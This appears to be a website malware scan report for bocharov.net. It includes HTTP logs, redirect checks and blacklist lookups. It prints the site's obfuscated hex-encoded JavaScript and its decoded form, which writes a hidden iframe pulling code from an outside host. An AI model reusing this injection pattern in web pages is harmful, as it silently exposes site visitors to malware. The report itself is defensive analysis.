Scanned pages/files
Request | Server response | Status |
http://bocharov.net/ | 200 OK Content-Length: 933 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v476ff6bd791e6(v476ff6bd791f4){ var v476ff6bd79205=16; return(parseInt(v476ff6bd791f4,v476ff6bd79205));}function v476ff6bd79241(v476ff6bd79253){ var v476ff6bd79285=2; var v476ff6bd79269='';for(v476ff6bd79276=0; v476ff6bd79276<v476ff6bd79253.length; v476ff6bd79276+=v476ff6bd79285){ v476ff6bd79269+=(String.fromCharCode(v476ff6bd791e6(v476ff6bd79253.substr(v476ff6bd79276, v476ff6bd79285))));}return v476ff6bd79269;} document.write(v476ff6bd79241('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6533646336646266207372633D5C27687474703A2F2F737461726C6F6769632E696E2F746F726E6161646F2F636F756E742E7068703F6F3D313F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A333435353736292B2763366562396335645C272077696474683D373438206865696768743D343632207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); Decoded script: <SCRIPT>window.status='Done';document.write('<iframe name=e3dc6dbf src=\'http://starlogic.in/tornaado/count.php?o=1?'+Math.round(Math.random()*345576)+'c6eb9c5d\' width=748 height=462 style=\'display: none\'></iframe>')</SCRIPT> Antivirus reports:
| ||
http://bocharov.net/test404page.js | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bocharov.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 00:12:55 GMT
Accept-Ranges: bytes
ETag: "4ca0107-3a5-509d587c8ec2c"
Server: Apache/2.2.15 (CentOS)
Content-Length: 933
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 10 Dec 2014 04:59:54 GMT
...933 bytes of data.
GET / HTTP/1.1
Host: bocharov.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 00:12:55 GMT
Accept-Ranges: bytes
ETag: "4ca0107-3a5-509d587c8ec2c"
Server: Apache/2.2.15 (CentOS)
Content-Length: 933
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 10 Dec 2014 04:59:54 GMT
...933 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bocharov.net
Referer: http://www.google.com/search?q=bocharov.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bocharov.net
Referer: http://www.google.com/search?q=bocharov.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bocharov.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bocharov.net/
Result: bocharov.net is not infected or malware details are not published yet.
Result: bocharov.net is not infected or malware details are not published yet.